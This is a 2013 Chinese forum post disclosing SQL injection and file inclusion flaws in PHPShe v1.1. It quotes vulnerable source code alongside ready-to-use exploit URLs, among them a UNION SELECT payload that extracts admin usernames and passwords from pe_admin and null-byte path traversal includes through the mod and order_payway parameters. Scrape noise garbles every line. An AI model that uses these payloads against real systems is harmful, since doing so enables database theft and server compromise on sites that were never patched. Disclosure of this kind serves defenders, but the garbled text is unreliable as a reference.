找回密码
 立即注册
查看: 3152|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
0 Q# p5 D* K$ N7 G2 r2 Y/* Phpshe v1.1 Vulnerability
5 a* b% Z0 B% s/ a/* ========================
- }8 B( M8 C4 ^3 j, e2 s8 V/* By: : Kn1f3) c1 I& \" U) u# N/ E3 A, a, J! f
/* E-Mail : 681796@qq.com8 q( H. D8 k( z! C" i3 M2 Z1 y  H, z  Y
/*******************************************************/7 O# k& ^" ?+ x- h- w4 @4 \( M
0×00 整体大概参数传输9 t: n; H7 w2 p: o* t
: h( Z% P2 X% S4 [( c; ?

4 i8 u9 }2 C* x. J% k  \  @

0 t+ c- }+ I5 w2 I8 \. a' R//common.php/ k& j7 _# d+ s5 m' ]5 a
if (get_magic_quotes_gpc()) {* {# l% G  d6 k4 G1 W9 v6 \% Z9 L
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');# \2 c  j! Q0 z0 t4 g1 |3 R
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
2 y3 ]* @7 h; Q6 ^& K}
) W# X+ E6 h: q  I0 X, ielse {: L( j/ u  X! k: [
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');! Q6 N% m0 l, S5 P& H2 O
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');% v  J9 g' x+ \, `' K
}+ \* X& G$ [+ A- O
session_start();
, Q; c  V. T) M9 B!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');9 p( m% H4 x5 l2 e/ ~
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');  \2 y' \5 s$ Q9 N5 Q
3 I0 n1 I: ?2 P' d  [$ h0 f
0×01 包含漏洞
  s6 Y9 Q- t" K4 K* o' y # f  c, o" T* y0 u2 N3 W( b; m8 E
- l) b( j- `) r) F7 T8 o
//首页文件
6 L: r8 b$ _" d/ G* X5 f! p2 [<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);0 N/ i+ C" n7 U* L0 w5 I! e
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
( T# K8 o& c& S; ]pe_result();
* k' e3 p7 A; a1 z% G- P?>
+ t( _' n1 ?( v( i7 k# [/ h7 V5 F  Q//common 文件 第15行开始; O' G2 q9 @1 g( g
url路由配置
3 r) T/ T' x5 O- \; \/ r  N$module = $mod = $act = 'index';/ @$ @% v7 ^( O, @% U$ M
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
& Q( O0 ^- }/ p( C  S$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);' h9 D, ]) G; K0 L) v+ p6 A
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);: v2 w5 V7 n' h# M5 ?
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00  |7 m5 I" }+ o" z6 Z! v3 K6 f

7 m; u8 p. g/ g! a; U
, g! p: `+ E- M: I$ n
0×02 搜索注入
0 v5 N1 b3 j( i0 ^3 r
5 l" g; O1 D9 L; o4 \" v<code id="code2">

//product.php文件
  M5 }- d4 O* f9 b# scase 'list':! b7 m1 a' {- l* z/ g7 i% n- Q
$category_id = intval($id);$ G9 \" d# H& j3 m& n8 r
$info = $db->pe_select('category', array('category_id'=>$category_id));: I! x& j0 d( E2 g7 _3 I9 `6 `
//搜索9 H6 y+ _8 S3 _: |: q4 k' S
$sqlwhere = " and `product_state` = 1";; v$ b4 b2 `' ?% ~: V
pe_lead('hook/category.hook.php');8 L" e; d5 ^+ k& D! C" [3 x
if ($category_id) {# i' ]9 O$ ]% Q- v2 @8 R3 h. q
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";" y8 k/ _5 `! y
}
( f+ i) I% U4 E0 B" y$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤. f* Q$ q4 E/ l3 L# N
if ($_g_orderby) {
% g; u; H9 f+ x9 G2 o$ a7 {6 B$orderby = explode('_', $_g_orderby);
8 Y: {8 a2 v" M: e( o3 h$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
( T5 X0 O& A- n4 M}
0 I% d- w) R; T) Welse {* N4 E& f$ ]; V2 s' R! w
$sqlwhere .= " order by `product_id` desc";6 d4 e; t& t! ~
}
' l# H, N5 Z8 E, b* i  Y+ v5 F$ h$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));# D! o& |: ^: n& V& U+ @' X
//热卖排行
  s/ b# g7 V2 C% Y$product_hotlist = product_hotlist();
/ K) d: `" E" e/ m//当前路径
& J& I* k, u# \! m8 Y% M$nowpath = category_path($category_id);, _/ L3 j7 y: N  b" u
$seo = pe_seo($info['category_name']);& |9 E7 E2 U! g
include(pe_tpl('product_list.html'));
/ O( f# F' P* J( n9 V1 a//跟进selectall函数库
* Q0 m* i# T0 m, f  hpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
: D8 K) V  U- W{8 l% P7 @) a3 n+ v  g3 @' A
//处理条件语句; E, ?; r6 Z. U( B/ x! j
$sqlwhere = $this->_dowhere($where);
8 `+ t! \" N9 _+ [return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);4 D1 E% }6 X2 w" B
}5 o) j7 R8 \, R8 s+ X5 t- k- ~  D& J( a
//exp
/ R9 X, ~7 o6 }+ e' kproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
+ p* I% m" H! a4 R: ?0 Y$ n- ~7 d

</code># F- J% N+ {$ f* C* G6 w; c0 H. o

6 d3 R- o* L* q/ _+ L0 b' B2 n( l0×03 包含漏洞21 w' J4 f7 @2 g% u( {
, }* d3 ~2 {6 M" m0 y
<code id="code3">

//order.php

case 'pay':


8 R* X% h  j# e2 B3 k$order_id = pe_dbhold($_g_id);

0 t% P/ |/ ~6 N& p3 Z6 p
$cache_payway = cache::get('payway');

8 t+ e6 ~+ V! f7 K; H- _
foreach($cache_payway as $k => $v) {


2 ?0 L; x/ u: v% k2 P/ Q" O5 Q, Z$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

2 |, ?' y; ]) d" u; r* T8 H
if ($k == 'bank') {


0 R# m' A# \- }% z( C+ s* U$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

4 |2 J* f$ C8 L. i3 V  [
}

6 {$ M$ H* N: p
}

7 |- d2 o& Z4 ~. H
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


$ \$ n0 J+ |% U!$order['order_id'] && pe_error('订单号错误...');

2 u1 r% a. L. D  {
if (isset($_p_pesubmit)) {

+ `  O6 ^; B4 D" g" S5 b2 B4 H0 s
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

' t" `6 e3 }  b' ~# l" `5 A
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


) |- o2 U$ \* p+ j4 T- yforeach ($info_list as $v) {


3 N$ }/ }4 ^; E4 C4 I0 j" r$order['order_name'] .= "{$v['product_name']};";
- d' S8 y4 t" a7 w) n


6 a  U, J% L% m) S3 _/ M}

: _  ]; s  V* m* c) a; L8 \" M$ T
echo '正在为您连接支付网站,请稍后...';

4 z( o1 b) q. u% z6 D. ~
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

" t: [$ K2 W9 t" |% W1 d! f! w( J
}//当一切准备好的时候就可以进行"鸡肋包含了"


/ i* z2 x8 G/ r6 P# O: zelse {

/ n: ~. w' o' x1 ^& F. P
pe_error('支付错误...');

& D6 ^+ s5 f& I3 w& [( }
}


+ D3 \2 L# _0 t& |" _7 W/ X1 A}

, b4 Y/ d' D3 j* n' J4 U4 ?
$seo = pe_seo('选择支付方式');

- X( ^4 |- p/ ~5 [) C2 p; r( V
include(pe_tpl('order_pay.html'));


4 \8 K* t0 _* R6 o& f2 v1 ubreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>/ |4 i/ I6 n9 @% V

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表